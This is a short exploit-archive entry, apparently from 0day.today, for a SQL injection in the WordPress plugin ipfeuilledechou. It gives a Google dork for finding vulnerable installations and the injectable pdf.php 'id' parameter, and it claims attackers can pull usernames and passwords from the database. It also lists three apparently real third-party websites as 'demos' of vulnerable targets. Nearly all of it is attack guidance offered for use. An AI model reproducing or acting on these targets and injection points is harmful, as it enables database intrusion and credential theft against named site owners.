id: 20206
date: 01/20/2013
title: Wordpress plugin ipfeuilledechou SQL Injection Vulnerability
author: Zikou-16
cves: 

-------------------------------------------------------------------
Wordpress plugins - ipfeuilledechou SQL Injection Vulnerability 
-------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/ipfeuilledechou/"
# Tested on : Windows 7 , Backtrack 5r3
####
 
#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password
------------------

#=> SQL Injection 

http://[target]/[path]wp-content/plugins/ipfeuilledechou/pdf.php?id=25'[inj3ct h3re]

------------------------------

#=> Demos :
 
http://www.ps76.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=25

http://christophebouillon.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=13

http://www.nicolasrouly.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=32

------------------------------ <= Th3 End ^_^'

#  0day.today [2023-03-22]  #